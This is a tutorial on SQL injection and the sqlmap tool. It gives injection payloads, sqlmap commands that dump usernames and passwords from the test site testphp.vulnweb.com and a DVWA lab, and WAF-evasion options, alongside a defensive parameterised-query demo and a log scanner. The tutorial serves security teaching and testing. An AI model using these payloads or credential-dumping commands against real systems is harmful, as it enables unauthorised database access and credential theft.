SQL Injection Exploitation Made Easy: A Practical Guide to SQLMAP
Learn how to exploit SQL injection vulnerabilities using SQLMAP, an automated penetration testing tool for database security assessment.
Introduction
SQL Injection remains one of the most critical vulnerabilities in web applications, allowing attackers to manipulate backend databases. SQLMAP, an advanced penetration testing tool, automates the exploitation process, making database enumeration and extraction effortless. This guide will walk you through SQL Injection, its types, and SQLMAP’s powerful capabilities with real-world examples on test environments like TestVulnHub and DVWA.
Index
- What is SQL Injection?
- SQL Injection Basics (with practical commands)
- SQL Injection Types
- SQLMAP Guide
- Basics about SQLMAP
- SQLMAP Command Reference Table
- Practical SQLMAP Commands (TestVulnHub)
- Practical SQLMAP Commands with Cookies (DVWA)
What is SQL Injection?
SQL Injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries a web application makes to its database. By injecting malicious SQL statements, an attacker can view, modify, or delete data and even gain administrative access.
SQL Injection Basics (with Practical Commands)
A basic SQL Injection attack involves injecting SQL queries via an application’s input fields. Below are common payloads used to test for SQL Injection:
1. Authentication Bypass:
This payload bypasses authentication mechanisms by always returning a true condition.
' OR 1=1 --
2. Identifying Number of Columns:
This helps identify how many columns the vulnerable query returns, which a UNION payload must match.
' ORDER BY 3 --
3. Extracting Database Version:
This retrieves the database version information.
' UNION SELECT NULL, @@version, NULL --
4. Retrieving Current Database:
This extracts the name of the current database in use.
' UNION SELECT NULL, database(), NULL --
5. Listing Usernames from a Table:
This retrieves stored usernames and passwords (if available in plaintext).
' UNION SELECT NULL, username, password FROM users --
6. Checking Database Users:
This retrieves the database users.
' UNION SELECT NULL, user FROM mysql.user --
7. Extracting Table Names:
This helps in enumerating available tables in the database.
' UNION SELECT NULL, table_name FROM information_schema.tables --
8. Extracting Column Names:
This reveals column names of a specific table.
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users' --
9. Extracting Data from a Specific Column:
This extracts usernames from the ‘users’ table.
' UNION SELECT username FROM users --
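The authentication bypass from step 1, shown against a string-built query and against a parameterised one. This is an added example, not code from the article: it uses an in-memory SQLite table so it runs offline, and the users and password hashes are constructed.

```python
# Added example, not code from the article: the "' OR 1=1 --" payload from
# step 1 against a string-built query and against a parameterised one.
# SQLite is used so the demo runs offline; the users and hashes are made up.
import sqlite3

SAMPLE_USERS = [("alice", "hash_of_alice_pw"), ("bob", "hash_of_bob_pw")]


def make_db() -> sqlite3.Connection:
    """Create an in-memory users table populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username: str, password: str) -> list:
    """Concatenation: the quote ends the literal and '--' comments out the
    password check, so the WHERE clause collapses to '' OR 1=1."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return sorted(row[0] for row in conn.execute(sql))


def login_safe(conn, username: str, password: str) -> list:
    """Placeholders: the input travels as data and is never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (username, password)))


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1 --"
    print("vulnerable:", login_vulnerable(db, payload, "anything"))  # every user
    print("safe:", login_safe(db, payload, "anything"))              # no user
```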
SQL Injection Types
- In-band SQLi (Classic) — Uses the same communication channel to perform the attack and retrieve results. This includes Error-Based and Union-Based SQLi.
- Inferential SQLi (Blind) — No direct database response; attacker infers information based on application behavior. This includes Boolean-Based and Time-Based SQLi.
- Out-of-band SQLi — Uses different channels (like DNS or HTTP requests) to exfiltrate data when in-band methods are unavailable.
- Error-Based SQLi — Extracts information through error messages.
- Union-Based SQLi — Uses the UNION SQL operator to combine results.
- Boolean-Based SQLi — Determines responses based on true/false conditions.
- Time-Based SQLi — Uses time delays to infer database responses.
SQLMAP Guide:
SQLMAP Basics:
SQLMAP is an open-source penetration testing tool that automates SQL Injection detection and exploitation. It supports multiple injection techniques and database management systems (DBMS), including MySQL, PostgreSQL, and MSSQL.
SQLMAP Command Reference Table:

SQLMAP Test Case 1 {Basic} (TestVulnHub)
Below are practical SQLMAP commands executed on testphp.vulnweb.com:
1. Enumerate databases
This command retrieves the names of all databases available on the target system.
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 --dbs
From the screenshot, we can see the database names acuart and information_schema.
2. Enumerate tables from a specific database
This command lists all tables within the acuart database.
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart --tables
From the Screenshot, we can see the various table names.
3. Enumerate columns from a specific table
This command retrieves the column names from the users table in the acuart database.
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart -T users --columns
From the Screenshot, we can see the various Column names.
4. Dump specific user data (username & password) from a table
This command extracts and displays usernames and passwords from the users table.
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=2 -D acuart -T users -C uname,pass --dump
From the screenshot, we can see the desired information.
SQLMAP Test Case 2 {Intermediate — Cookies} (DVWA)
Below are SQLMAP commands executed on DVWA using session cookies:
Cookies can be easily accessed via Right Click > Inspect > Storage > Cookies as shown in the Screenshot.
1. Enumerate databases
This command retrieves all available databases while using an authenticated session.
sqlmap -u "http://10.10.29.76/vulnerabilities/sqli_blind/?id=3&Submit=Submit#" --cookie="PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXXXXX; security=low" --dbs
2. Enumerate tables from a specific database
This command lists all tables in the dvwa database.
sqlmap -u "http://10.10.29.76/vulnerabilities/sqli_blind/?id=3&Submit=Submit#" --cookie="PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXXXXX; security=low" -D dvwa --tables
3. Enumerate columns from a specific table:
This command displays column names in the users table of the dvwa database.
sqlmap -u "http://10.10.29.76/vulnerabilities/sqli_blind/?id=3&Submit=Submit#" --cookie="PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXXXXX; security=low" -D dvwa -T users --columns
4. Dump specific user data (user ID & password) from a table
This command retrieves and displays user IDs and password hashes from the users table.
sqlmap -u "http://10.10.29.76/vulnerabilities/sqli_blind/?id=3&Submit=Submit#" --cookie="PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXXXXX; security=low" -D dvwa -T users -C user_id,password --dump
SQLMAP Test Case 3 {Advanced} (Bypassing WAFs with SQLMAP)
Web Application Firewalls (WAFs) are designed to block SQL Injection attempts. However, SQLMAP offers various evasion techniques to bypass WAF protections.
1. Tamper Scripts:
SQLMAP includes multiple tamper scripts to obfuscate SQL payloads. Some useful ones include:
sqlmap -u "http://target.com/vuln.php?id=1" --tamper=space2comment,randomcase
Common tamper scripts:
- space2comment: Converts spaces to inline comments (/**/)
- randomcase: Randomizes uppercase/lowercase letters
- between: Replaces equal (=) signs with BETWEEN
2. Using Hex Encoding:
This encodes payloads in hexadecimal to evade signature-based detection.
sqlmap -u "http://target.com/vuln.php?id=1" --hex
3. Changing User-Agent and Referer Headers:
This helps avoid WAFs that block automated scanners.
sqlmap -u "http://target.com/vuln.php?id=1" --user-agent="Mozilla/5.0" --referer="http://google.com"
4. Custom Injection Points:
Appending * to a parameter value marks a custom injection point, so SQLMAP injects its payloads there instead of guessing.
sqlmap -u "http://target.com/vuln.php?id=1*" --dbs
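A defender-side counterpart to the tamper scripts and User-Agent switching described in this section, as an added example that is not from the article: a small access-log scanner that URL-decodes each query string, undoes the space2comment and randomcase obfuscation, and flags the UNION, ORDER BY, information_schema and sqlmap User-Agent traces that the earlier sections produce. The log lines, IP addresses and rule names are constructed.

```python
# Added example, not from the article: flag SQL-injection probes in access
# logs after undoing the space2comment and randomcase tamper tricks, and
# flag the default sqlmap User-Agent. All log lines below are constructed.
import re
from urllib.parse import unquote_plus

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d+) \S+ "([^"]*)" "([^"]*)"$')

SQLI_PATTERNS = {                      # matched against the normalised query
    "union-select": r"\bunion\b.*\bselect\b",
    "order-by probe": r"\border by \d+",
    "schema enumeration": r"\binformation_schema\b|\bmysql\.user\b",
    "version fingerprint": r"@@version",
    "time-based probe": r"\b(sleep|benchmark)\s*\(",
    "between tamper": r"\bbetween\b \S+ \band\b \S+",   # '=' rewritten by between
}
# Constructed sample lines (Apache combined format, documentation IP ranges).
LOG_LINES = [
    '203.0.113.5 - - [10/Mar/2025:12:00:01 +0000] "GET /artists.php?artist=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Mar/2025:12:00:02 +0000] "GET /artists.php?artist=2%20UNION%20SELECT%20NULL,@@version,NULL-- HTTP/1.1" 200 640 "-" "sqlmap/1.8 (https://sqlmap.org)"',
    '203.0.113.7 - - [10/Mar/2025:12:00:03 +0000] "GET /vuln.php?id=1%27%20uNiOn/**/sElEcT/**/NULL,user/**/fRoM/**/mysql.user-- HTTP/1.1" 200 640 "http://google.com" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2025:12:00:04 +0000] "GET /search.php?q=between%20the%20lines HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
]

def normalise(raw_query: str) -> str:
    """Undo cheap obfuscation so rules match one lowercase, single-spaced string."""
    q = unquote_plus(raw_query)        # %20 -> space, %27 -> quote
    q = q.replace("/**/", " ")         # reverse space2comment
    q = re.sub(r"\s+", " ", q)
    return q.lower()                   # reverse randomcase

def scan_line(line: str):
    """Return a finding dict for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None                    # unparseable line: skip, don't crash
    ip, _method, target, _status, _referer, ua = m.groups()
    reasons = []
    if "sqlmap" in ua.lower():         # default UA before --user-agent is set
        reasons.append("sqlmap user-agent")
    path, _, query = target.partition("?")
    norm = normalise(query)
    reasons += [name for name, pat in SQLI_PATTERNS.items() if re.search(pat, norm)]
    return {"ip": ip, "path": path, "reasons": reasons} if reasons else None

def scan(lines):
    return [hit for hit in map(scan_line, lines) if hit]

if __name__ == "__main__":
    for finding in scan(LOG_LINES):
        print(finding)
```

The last sample line shows why the between rule requires the "X AND Y" shape: ordinary text containing the word "between" does not fire.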
Conclusion
SQLMAP is an essential tool for security professionals and penetration testers, enabling efficient exploitation of SQL Injection vulnerabilities. Understanding its commands and capabilities ensures thorough database security assessments. Always test in legal environments and use SQLMAP responsibly to strengthen cybersecurity defenses.